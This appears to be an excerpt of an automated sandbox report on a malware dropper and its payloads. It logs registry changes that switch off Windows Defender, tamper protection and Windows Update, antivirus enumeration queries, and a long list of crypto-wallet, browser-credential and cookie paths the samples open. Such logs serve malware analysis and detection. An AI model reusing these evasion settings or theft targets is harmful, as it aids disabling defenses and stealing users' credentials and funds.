                    Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | Code function: 0_2_00B1CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00B1CBEA
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableIOAVProtection 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring 1
                    Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | Registry value created: DisableNotifications 1
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Registry value created: TamperProtection 0
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
                    Source: 7620ab885d.exe, 00000009.00000003.2204997924.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2192229924.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2289015343.000000000114E000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2245976063.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2314083807.000000000114F000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000002.2316994067.000000000114F000.00000004.00000020.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2246222179.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2549974130.000000000587A000.00000004.00000020.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2488648561.0000000000742000.00000004.00000020.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2726512809.0000000000D09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 0.2.cMTqzvmx9u.exe.b00000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.skotes.exe.bd0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.1522880580.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1491932263.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.1521311555.0000000000BD1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR
                    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.2343637701.000001C130C03000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: 0a7e8af92e.exe PID: 632, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                    Source: 7620ab885d.exe, 00000009.00000003.2153964986.0000000000B98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\walletsLR
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3G
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: qdC:\Users\user\AppData\Roaming\Binance
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Ethereum
                    Source: 7620ab885d.exe, 00000009.00000003.2153941234.0000000000BF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000027CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: 7620ab885d.exe, 00000009.00000003.2153915003.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
